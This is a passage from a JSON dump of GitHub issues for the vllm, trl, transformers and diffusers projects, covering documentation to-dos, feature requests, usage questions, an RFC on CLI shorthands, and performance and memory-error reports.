}, { "repo": "vllm-project/vllm", "number": 27872, "title": "[Feature]: AFD support load customer connect model from local path.", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nAdd `afd_connector_module_path` field in AFDConfig, user can implement customer afd connect, but don't need change vllm code.\n\nhttps://github.com/vllm-project/vllm/pull/25162 merge after.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27872", "state": "open", "labels": [ "feature request" ], "created_at": "2025-10-31T09:08:50Z", "updated_at": "2025-12-08T03:32:33Z", "comments": 1, "user": "lengrongfu" }, { "repo": "huggingface/trl", "number": 4413, "title": "What is the default value of num_processes?", "body": "Based on the documentation on page docs/source/grpo_trainer.md, num_processes is used but nowhere does the documentation define what num_processes is or what is its default value.", "url": "https://github.com/huggingface/trl/issues/4413", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-10-31T05:01:23Z", "updated_at": "2025-10-31T17:31:33Z", "user": "thisisraghavkumar" }, { "repo": "huggingface/diffusers", "number": 12564, "title": "[Proposals Welcome] Fal Flashpack integration for faster model loading", "body": "Hey! 
\ud83d\udc4b\n\nWe've had a request to explore integrating Fal's Flashpack for faster DiT and Text Encoder loading (https://github.com/huggingface/diffusers/issues/12550). Before we jump into implementation, we wanted to open this up to the community to gather ideas and hear from anyone who's experimented with this.\n\nWe'd love your input on:\n1. Performance: Has anyone tried it? What kind of speedups did you see? Are there any performance trade-offs?\n2. Integration Design: How would you approach it if you were to integrate this into Diffusers? Describe your design at a high level - how would we support this in our existing framework and what would the API look like?\n\nWe're looking for proposals and ideas rather than PRs at this stage. We're genuinely interested in hearing different approaches and perspectives from the community on this.\n\nFeel free to share your thoughts!\n", "url": "https://github.com/huggingface/diffusers/issues/12564", "state": "open", "labels": [ "help wanted", "contributions-welcome" ], "created_at": "2025-10-31T02:25:55Z", "updated_at": "2025-10-31T12:26:13Z", "comments": 2, "user": "yiyixuxu" }, { "repo": "vllm-project/vllm", "number": 27832, "title": "[RFC]: Remap `CompilationConfig` from `-O` to `-cc` in CLI", "body": "### Motivation.\n\nWith #20283 (and #26847), we're repurposing `-O0`/`-O1`/`-O2`/`-O3` to map to `optimization_level` instead of `CompilationConfig.level`/`CompilationConfig.mode`. This leaves us in a slightly confusing state where `-O` can refer to optimization level or compilation config depending on what follows it:\n- `-O0` -> `optimization_level=0`\n- `-O 3` -> `optimization_level=3`\n- `-O {\"cudagraph_mode\": \"NONE\"}` -> `CompilationConfig(cudagraph_mode=\"NONE\")`\n- `-O.use_inductor=False` -> `CompilationConfig(use_inductor=False)`\n- `--compilation-config.backend=eager` -> `CompilationConfig(backend=\"eager\")`\n\nThis is bad UX, and we should fix it. However, a CLI shorthand for `CompilationConfig` is still needed so users can easily compose different properties.\n\n### Proposed Change.\n\nThe new shorthand for `CompilationConfig` should be `-cc`. Other options are `-c` and `-C`, but as discussed [here](https://github.com/vllm-project/vllm/pull/26847#discussion_r2439248068), single letters are not \"pythonic\" and capital letters are worse (extra `Shift` keystroke + less pythonic). However, the exact shorthand is up for discussion.
React below to cast your vote.\n\nExample changes:\n- `-O0` -> `-O0` (unchanged)\n- `-O 3` -> `-O 3` (unchanged)\n- `-O {\"cudagraph_mode\": \"NONE\"}` -> `-cc {\"cudagraph_mode\": \"NONE\"}`\n- `-O.use_inductor=False` -> `-cc.use_inductor=False`\n- `--compilation-config.backend=eager` -> `--compilation-config.backend=eager` (unchanged)\n\n### Feedback Period.\n\nOne week, 10/30 - 11/5\n\n### CC List.\n\n@hmellor @morrison-turnansky @zou3519\n\n### Any Other Things.\n\nVote for your preferred shorthand:\n- \ud83d\udc4d for `-cc`\n- \ud83d\udc4e for `-O` (keep it the same)\n- \ud83c\udf89 for `-C`\n- \ud83d\ude80 for `-c`\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27832", "state": "closed", "labels": [ "help wanted", "good first issue", "RFC", "torch.compile" ], "created_at": "2025-10-30T20:29:31Z", "updated_at": "2025-11-28T21:51:13Z", "comments": 3, "user": "ProExpertProg" }, { "repo": "huggingface/trl", "number": 4407, "title": "Complete paper index", "body": "These are the papers mentioned at least one in the codebase.\n\n- [ ] https://huggingface.co/papers/1707.06347\n- [x] https://huggingface.co/papers/1909.08593 (only mentioned in notebook, no need to have in paper index)\n- [x] https://huggingface.co/papers/1910.02054 #4551\n- [ ] https://huggingface.co/papers/1910.10683\n- [x] https://huggingface.co/papers/2106.09685 #4441\n- [ ] https://huggingface.co/papers/2211.14275\n- [x] https://huggingface.co/papers/2305.10425 #3990\n- [x] https://huggingface.co/papers/2305.18290 #3937\n- [ ] https://huggingface.co/papers/2306.13649\n- [x] https://huggingface.co/papers/2307.09288 #4094\n- [x] https://huggingface.co/papers/2309.06657 #4441\n- [ ] https://huggingface.co/papers/2309.16240 #3906\n- [x] https://huggingface.co/papers/2310.12036 #3990\n- [ ] https://huggingface.co/papers/2312.00886\n- [x] https://huggingface.co/papers/2312.09244 #4094\n- [ ] https://huggingface.co/papers/2401.08417\n- [x] https://huggingface.co/papers/2402.00856 #3990\n- [x] https://huggingface.co/papers/2402.01306 #4440 \n- [x] https://huggingface.co/papers/2402.03300 #4441\n- [ ] https://huggingface.co/papers/2402.04792\n- [x] https://huggingface.co/papers/2402.05369 #3990\n- [ ] https://huggingface.co/papers/2402.09353\n- [x] https://huggingface.co/papers/2402.14740 #3801\n- [x] https://huggingface.co/papers/2403.00409 #3990\n- [ ] https://huggingface.co/papers/2403.07691\n- [x] https://huggingface.co/papers/2403.17031 (these are implementations details, no need to have in paper index)\n- [x] https://huggingface.co/papers/2404.04656 #3990\n- [ ] https://huggingface.co/papers/2404.09656\n- [ ] https://huggingface.co/papers/2404.19733\n- [x] https://huggingface.co/papers/2405.00675 #3900\n- [ ] https://huggingface.co/papers/2405.14734\n- [ ] https://huggingface.co/papers/2405.16436\n- [ ] https://huggingface.co/papers/2405.21046\n- [x] https://huggingface.co/papers/2406.05882 #3990\n- [x] https://huggingface.co/papers/2406.08414 #3990\n- [ ] https://huggingface.co/papers/2406.11827 #3906\n- [x] https://huggingface.co/papers/2407.21783 (LLaMA 3 paper, no need to have in paper index)\n- [x] https://huggingface.co/papers/2408.06266 #3990\n- [ ] https://huggingface.co/papers/2409.06411 #3906\n- [ ] 
https://huggingface.co/papers/2409.20370\n- [ ] https://huggingface.co/papers/2411.10442\n- [ ] https://huggingface.co/papers/2501.03262\n- [x] https://huggingface.co/papers/2501.03884 #3824\n- [ ] https://huggingface.co/papers/2501.12599 (Kimi 1.5 paper mentioned in an example, no need to have in paper index)\n- [ ] https://huggingface.co/papers/2501.12948\n- [x] https://huggingface.co/papers/2503.14476 #3937\n- [x] https://huggingface.co/papers/2503.20783 #3937\n- [x] https://huggingface.co/papers/2503.24290 (link to justify beta=0 in the doc, no need to have in paper index)\n- [ ] https://huggingface.co/papers/2505.07291\n- [x] https://huggingface.co/papers/2506.01939 #4580 \n- [x] https://huggingface.co/papers/2507.18071 #3775\n- [x] https://huggingface.co/papers/2508.00180 #3855\n- [x] https://huggingface.co/papers/2508.05629 #4042\n- [x] https://huggingface.co/papers/2508.08221 #3935\n- [x] https://huggingface.co/papers/2508.09726 #3989\n\n\n", "url": "https://github.com/huggingface/trl/issues/4407", "state": "open", "labels": [ "\ud83d\udcda documentation" ], "created_at": "2025-10-30T20:23:26Z", "updated_at": "2025-12-24T05:50:21Z", "comments": 4, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 27830, "title": "[Usage]: GPT OSS 120b on L40S (Ada)", "body": "### Your current environment\n\n(Just a general question)\n\n\n### How would you like to use vllm\n\nI want to run inference of GPT OSS 120b with multiple L40S. I read the [docs](https://docs.vllm.ai/projects/recipes/en/latest/OpenAI/GPT-OSS.html), which clearly say it is not natively supported yet. After I had no success with vLLM, it worked plug-and-play with Ollama. My question is whether there is any roadmap where I can see the progress, or whether it is even possible to contribute to solving that problem. Unfortunately I am not familiar with GPUs; however, I need to get it running. Any suggestion is highly appreciated. Even a clear description of the problem and what would be required to solve it would be a real help. Thank you.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27830", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-30T20:07:42Z", "updated_at": "2025-11-17T12:46:43Z", "comments": 6, "user": "Hansehart" }, { "repo": "vllm-project/vllm", "number": 27823, "title": "[Doc]: Multi-node distributed guide issues", "body": "### \ud83d\udcda The doc issue\n\nFor context, see a recent issue (https://github.com/ROCm/ROCm/issues/5567) where a user was trying to set up distributed inference with `ray` by following guidance at https://docs.vllm.ai/en/v0.8.0/serving/distributed_serving.html#running-vllm-on-multiple-nodes.
I ran into several issues setting this up on AMD GPUs that I believe might be deficiencies in the vLLM docs:\n\n- The `run_cluster.sh` script passes `--gpus all`, which I believe is NVIDIA-only; I needed to remove this from the script\n- I had to add `--distributed_executor_backend=\"ray\"` to the `vllm serve` command to get vLLM to use the `ray` cluster that the script sets up\n- I had to set NCCL_SOCKET_IFNAME and GLOO_SOCKET_IFNAME to the appropriate network interfaces, otherwise I ran into an NCCL connection error\n- Relevant environment variables (NCCL_SOCKET_IFNAME, GLOO_SOCKET_IFNAME, NCCL_DEBUG) are not propagated to the Docker containers that the script creates; I worked around this by adding them to the `ray` invocation in `run_cluster.sh`, but I don't see a reason why the script shouldn't pass these to the container automatically\n\nI also needed to set `--enforce-eager` but I believe that is an issue specific to our current rocm/vllm Docker images.\n\nFor the above issues, I'm not sure which are general gaps in the documentation, which are AMD-specific, and which might have arisen from our Docker images. The image I used and got working was `rocm/vllm:latest` which at the time had vLLM 0.11.\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27823", "state": "open", "labels": [ "documentation" ], "created_at": "2025-10-30T18:33:04Z", "updated_at": "2025-10-30T18:33:04Z", "comments": 0, "user": "schung-amd" }, { "repo": "huggingface/trl", "number": 4399, "title": "Update or remove some of the notebooks", "body": "I suspect these notebooks are outdated; if so, they should be either updated or removed.\n- gpt2-sentiment-control.ipynb\n- best_of_n.ipynb\n- gpt2-sentiment.ipynb", "url": "https://github.com/huggingface/trl/issues/4399", "state": "closed", "labels": [ "\ud83d\udcda documentation" ], "created_at": "2025-10-30T15:34:36Z", "updated_at": "2025-11-04T23:52:50Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4397, "title": "Remove or move Multi Adapter RL", "body": "I don't think it makes sense to have this as a whole section in the doc.
Either remove it or update and move it to PEFT integration", "url": "https://github.com/huggingface/trl/issues/4397", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u26a1 PEFT" ], "created_at": "2025-10-30T15:12:58Z", "updated_at": "2025-11-04T23:57:56Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/transformers", "number": 41948, "title": "Does Qwen2VLImageProcessor treat two consecutive images as one group/feature?", "body": "When looking at the Qwen3-VL model's image processor (which uses Qwen2-VL's one), I found the following lines of code hard to understand.\n\n`L296-300` checks the number of input images (`patches.shape[0]`), and repeats the last one to make it divisible by `temporal_patch_size`.\nThis makes the model process two consecutive images as a single feature due to the use of 3DConv with temporal_patch_size=2 by default.\n\nhttps://github.com/huggingface/transformers/blob/76fc50a1527a7db593a6057903b749598f7000a9/src/transformers/models/qwen2_vl/image_processing_qwen2_vl.py#L293-L300\n\nBut as I understand, the Qwen2-VL paper mentions that it repeats each input image `temporal_patch_size` times.\nDid I misunderstand the code?\n\n\"Image\"\n\n", "url": "https://github.com/huggingface/transformers/issues/41948", "state": "closed", "labels": [], "created_at": "2025-10-30T09:23:50Z", "updated_at": "2025-10-31T01:01:09Z", "comments": 3, "user": "priancho" }, { "repo": "huggingface/transformers", "number": 41947, "title": "Why is Smolvlm-256M-Instruct slower than Internvl-v2-1B?", "body": "As the title says, Smolvlm has a smaller model size (1/4 the matrix multiplications) and a smaller input embedding. But both torch.cuda.Event timing and time.perf_counter with device sync report slower inference time?\n\nI wonder whether this is related to a wrong implementation of Smolvlm in transformers?\nInference performance comparison: \ninternvl-1B >\ninp_embed : (1, 547, 896)\ntrainable params: 17,596,416 || all params: 647,260,288 || trainable%: 2.7186\n\nsmolvlm-256M >\ninp_embed : (1, 171, 576)\ntrainable params: 9,768,960 || all params: 172,742,976 || trainable%: 5.6552\n\n---\n\nModel init (all flags turned on, especially flash attention!)
:\n```python\n if 'internvl' in self.variant.lower():\n if '3_5' in self.variant:\n self.model = AutoModelForImageTextToText.from_pretrained(self.variant, torch_dtype=torch.bfloat16, low_cpu_mem_usage=True, use_flash_attn=True, trust_remote_code=True)\n # internvl3.5, lm_head is not part of language_model !?\n lm_head = self.model.lm_head\n self.model = self.model.language_model\n self.model.lm_head = lm_head\n else:\n self.model = AutoModel.from_pretrained(\"OpenGVLab/InternVL2-1B\", torch_dtype=torch.bfloat16, low_cpu_mem_usage=True, use_flash_attn=True, trust_remote_code=True)\n self.model = self.model.language_model\n \n try:\n self.model.embed_tokens = self.model.base_model.embed_tokens\n except:\n self.model.embed_tokens = self.model.model.tok_embeddings\n elif 'smolvlm' in self.variant.lower():\n self.model = AutoModelForImageTextToText.from_pretrained(\"HuggingFaceTB/SmolVLM-256M-Instruct\", torch_dtype=torch.bfloat16, _attn_implementation=\"flash_attention_2\", trust_remote_code=True)\n lm_head = self.model.lm_head\n self.model = self.model.model.text_model\n self.model.lm_head = lm_head\n # self.model.embed_tokens already built-in!\n else:\n raise ValueError(f\"Carefull: Variant {self.variant} not tested.\")\n```\n\ncode snippet to measure fps :\n```python\nfor _ in range(30):\n _, _, _ = self.model(model_input)\n print('warm up done!')\n\nprof = Tch_prof(device=self.device)\n#prof = CudaEvent_Tch_prof(device=self.device)\nwith torch.no_grad():\n with prof: \n pred_speed_wps, pred_route, language = self.model(model_input, device=self.device) \n # timer + sync :\n # internvl v2-1b, lang mode : 0.3302s > 330ms ; no-lang mode : 0.0972s > 97ms (10 FPS) ?\n # smolvlm 256m, 0.3974s > 390ms ; no-lang : 0.1 s > 100ms ?\n\n # CudaEvent + sync : \n # internvl v2-1b, no-lang : 82.55ms ?\n # smolvlm 256m > no-lang : 90.68ms ? \n \n print(prof.get_profile())\n\n```\n\ncode snippet for timer classes :\n```python\nclass Tch_prof(object):\n def __init__(self, device):\n self.device = device\n self.hw_type = 'gpu'\n self.tlt_time = {\n 'cpu' : 0,\n 'gpu' : 0\n }\n\n def __enter__(self):\n torch.cuda.current_stream(self.device).synchronize()\n self.s = time.perf_counter() \n \n def __exit__(self, *exc):\n torch.cuda.current_stream(self.device).synchronize()\n self.tlt_time[self.hw_type] += time.perf_counter() - self.s\n \n def get_profile(self, hw_type='all'):\n if hw_type == 'all':\n return self.tlt_time\n elif hw_type in self.tlt_time.keys():\n return self.tlt_time[hw_type]\n else:\n raise RuntimeError(f\"No such hardware type {hw_type}\") \n\n\nclass CudaEvent_Tch_prof(object):\n def __init__(self, device):\n self.device = device\n self.start = torch.cuda.Event(enable_timing=True)\n self.end = torch.cuda.Event(enable_timing=True)\n\n def __enter__(self):\n self.start.record()\n \n def __exit__(self, *exc):\n self.end.record()\n torch.cuda.current_stream(self.device).synchronize()\n self.tlt_time = self.start.elapsed_time(self.end) \n \n def get_profile(self):\n return self.tlt_time \n```\n\nAny suggestion will be helpful !!", "url": "https://github.com/huggingface/transformers/issues/41947", "state": "closed", "labels": [], "created_at": "2025-10-30T08:10:28Z", "updated_at": "2025-10-31T11:47:44Z", "comments": 4, "user": "HuangChiEn" }, { "repo": "huggingface/trl", "number": 4386, "title": "Reference supported trainers in Liger Kernel integration guide", "body": "Currently, we only have an example with SFT, and it's hard to know which trainer supports liger. 
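For context, the existing SFT example boils down to something like this (a sketch; `use_liger_kernel` comes from `transformers.TrainingArguments`, which `SFTConfig` inherits from, and the model/dataset below are placeholders):\n```python\nfrom datasets import load_dataset\nfrom trl import SFTConfig, SFTTrainer\n\ndataset = load_dataset('trl-lib/Capybara', split='train')\n\n# Enable Liger kernels for the SFT run (assumes liger-kernel is installed).\ntraining_args = SFTConfig(output_dir='out', use_liger_kernel=True)\ntrainer = SFTTrainer(model='Qwen/Qwen2-0.5B', args=training_args, train_dataset=dataset)\ntrainer.train()\n```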
We should list the trainers that support Liger.", "url": "https://github.com/huggingface/trl/issues/4386", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\ud83c\udfcb SFT" ], "created_at": "2025-10-30T04:08:04Z", "updated_at": "2025-11-03T18:16:04Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4385, "title": "Use a common `trl-lib` namespace for the models/datasets/spaces", "body": "In the doc, we have examples using different namespaces, like `kashif/stack-llama-2`, `edbeeching/gpt-neo-125M-imdb` etc. We should unify all these examples to use a common `trl-lib` namespace.", "url": "https://github.com/huggingface/trl/issues/4385", "state": "open", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement" ], "created_at": "2025-10-30T04:04:10Z", "updated_at": "2025-10-30T04:04:38Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4384, "title": "Write the subsection \"Multi-Node Training\"", "body": "This section must be written, with a simple code example and a link to the `accelerate` documentation", "url": "https://github.com/huggingface/trl/issues/4384", "state": "open", "labels": [ "\ud83d\udcda documentation", "\u26a1accelerate" ], "created_at": "2025-10-30T03:57:53Z", "updated_at": "2025-12-08T16:23:23Z", "comments": 2, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4383, "title": "Add PEFT subsection to \"Reducing Memory Usage\"", "body": "PEFT is a major technique for reducing the memory usage of training. We should have a small section pointing to the PEFT integration guide", "url": "https://github.com/huggingface/trl/issues/4383", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\u26a1 PEFT" ], "created_at": "2025-10-30T03:55:55Z", "updated_at": "2025-11-07T00:03:01Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4382, "title": "Populate \"Speeding Up Training\"", "body": "Currently, this section only mentions vLLM. We should have a small guide for other methods, like flash attention.\nIdeally, to avoid repetition, we should have a very light example and a link to the place in the doc where it's more extensively discussed, e.g. vLLM pointing to the vLLM integration guide", "url": "https://github.com/huggingface/trl/issues/4382", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u26a1accelerate" ], "created_at": "2025-10-30T03:54:34Z", "updated_at": "2025-12-01T09:47:23Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4380, "title": "Fully transition from `flash-attn` to `kernels`", "body": "The new recommended way to use flash attention is to use kernels. We should update our tests and documentation to use `kernels` instead of \"flash_attention2\".
E.g.\n\nhttps://github.com/huggingface/trl/blob/1eb561c3e9133892a2e907d84123b46e40cbc5a0/docs/source/reducing_memory_usage.md#L149\n\n```diff\n- training_args = DPOConfig(..., padding_free=True, model_init_kwargs={\"attn_implementation\": \"flash_attention_2\"}) \n+ training_args = DPOConfig(..., padding_free=True, model_init_kwargs={\"attn_implementation\": \"kernels-community/flash-attn2\"}) \n```", "url": "https://github.com/huggingface/trl/issues/4380", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement" ], "created_at": "2025-10-30T03:46:07Z", "updated_at": "2025-11-13T04:07:35Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4379, "title": "Remove or populate \"Training customization\"", "body": "Currently, this part of the documentation shows some possible customizations that apply to all trainers https://huggingface.co/docs/trl/main/en/customization\n\nHowever, it only features a few examples. This section would make sense if it gets populated with other customizations; otherwise it should be removed. This thread can be used to discuss additional customizations", "url": "https://github.com/huggingface/trl/issues/4379", "state": "closed", "labels": [ "\ud83d\udcda documentation" ], "created_at": "2025-10-30T03:41:02Z", "updated_at": "2025-12-01T09:39:09Z", "comments": 0, "user": "qgallouedec" }, { "repo": "huggingface/trl", "number": 4378, "title": "Extend basic usage example to all supported CLIs", "body": "Currently https://huggingface.co/docs/trl/main/en/clis?command_line=Reward#basic-usage shows only basic usage examples for SFT, DPO and Reward. We should have it for all supported CLIs (i.e., GRPO, RLOO, KTO)", "url": "https://github.com/huggingface/trl/issues/4378", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\ud83c\udfcb KTO", "\ud83c\udfcb RLOO", "\ud83d\udcf1 cli", "\ud83c\udfcb GRPO" ], "created_at": "2025-10-30T03:35:36Z", "updated_at": "2025-11-14T01:13:17Z", "comments": 0, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 27783, "title": "[Usage]: Model performance different from API", "body": "### Your current environment\n\n```text\nvllm==0.10.0\n```\n\n\n### How would you like to use vllm\n\nI'm running the Qwen3-8B model with vllm. I also ran the same experiment using the Qwen3-8B API, but the results are quite different: the accuracy of the API model on my task is much higher than that of the vLLM model. I use the same temperature and top_k.
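For reference, a minimal sketch of how I pin the sampling settings explicitly on the vLLM side (placeholder values; differing defaults for things like top_p and max_tokens are a common source of such gaps):\n```python\nfrom vllm import LLM, SamplingParams\n\nllm = LLM(model='Qwen/Qwen3-8B')\n# Pin every sampling knob explicitly instead of relying on defaults.\nparams = SamplingParams(temperature=0.7, top_p=0.8, top_k=20, max_tokens=1024)\noutputs = llm.generate(['An example prompt'], params)\nprint(outputs[0].outputs[0].text)\n```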
\n\nIs there anyone else meeting the same question (the api-model is stronger than the vllm-model)?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27783", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-30T03:30:02Z", "updated_at": "2025-10-30T03:30:02Z", "comments": 0, "user": "fny21" }, { "repo": "vllm-project/vllm", "number": 27782, "title": "[Usage]: The same configuration v0.11.0 will report insufficient video memory compared to v0.8.5", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nThe server is a 4090 with 4 cards\nDocker runs vllm openai: v0.8.5 deployment command: \"command: --model /models/Qwen3/Qwen3-30B-A3B --enable-reasoning --reasoning-parser deepseek_r1 --tensor_parallel_size 4\" Can be deployed and started normally, switch the image version to v0.11.0, and run the command \"command: --model /models/Qwen3/Qwen3-30B-A3B --reasoning-parser deepseek_r1 --tensor_parallel_size 4\" It will report that the graphics card memory is insufficient, and the error log is:\nCapturing CUDA graphs (mixed prefill-decode, PIECEWISE): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 67/67 [00:19<00:00, 3.43it/s]\nCapturing CUDA graphs (decode, FULL): 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 35/35 [00:07<00:00, 4.78it/s]\nvllm | (Worker_TP3 pid=263) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP1 pid=261) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP0 pid=260) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP2 pid=262) INFO 10-29 19:57:20 [gpu_model_runner.py:3480] Graph capturing finished in 28 secs, took 1.88 GiB\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] WorkerProc hit an exception.\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] Traceback (most recent call last):\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/worker/gpu_model_runner.py\", line 3217, in _dummy_sampler_run\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] sampler_output = self.sampler(logits=logits,\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return self._call_impl(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return forward_call(*args, **kwargs)\nvllm | (Worker_TP2 
pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/sample/sampler.py\", line 100, in forward\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] sampled, processed_logprobs = self.sample(logits, sampling_metadata)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/sample/sampler.py\", line 180, in sample\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] random_sampled, processed_logprobs = self.topk_topp_sampler(\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return self._call_impl(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] return forward_call(*args, **kwargs)\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm | (Worker_TP2 pid=262) ERROR 10-29 19:57:21 [multiproc_executor.py:671] File \"/usr/local/lib/python3.12/dist-packages/vllm/v1/sample/ops/topk_topp_sampler.py\", line 122, in forward_cuda\nvllm | (Worker", "url": "https://github.com/vllm-project/vllm/issues/27782", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-30T03:24:54Z", "updated_at": "2025-11-06T06:53:15Z", "comments": 2, "user": "lan-qh" }, { "repo": "huggingface/trl", "number": 4376, "title": "Rewrite `peft_integration.md`", "body": "This section of the documentation is widely outdated and rely only on PPO.\n\nIdeally, we should have a clear documentation that shows how to use peft with SFT, DPO and GRPO at least, via the `peft_config` argument. We could have additional subsection about QLoRA and prompt-tuning.", "url": "https://github.com/huggingface/trl/issues/4376", "state": "closed", "labels": [], "created_at": "2025-10-30T03:23:24Z", "updated_at": "2025-11-24T10:39:27Z", "comments": 0, "user": "qgallouedec" }, { "repo": "vllm-project/vllm", "number": 27778, "title": "[Usage]: Is DP + PP a possible way to use vLLM?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nHi there, I wonder if we can adopt DP + PP in vLLM to form a heterogeneous inference pipeline. For example, If i have two V100 32G GPUs and one A100 80G GPU, can I utilize them in pipeline parallelism with vLLM? I might use V100 as the first stage, and A100 as the second. \nConsider that V100's compute ability is lower than A100, this would result in unbalance, and the V100 stage becomes a bottleneck. 
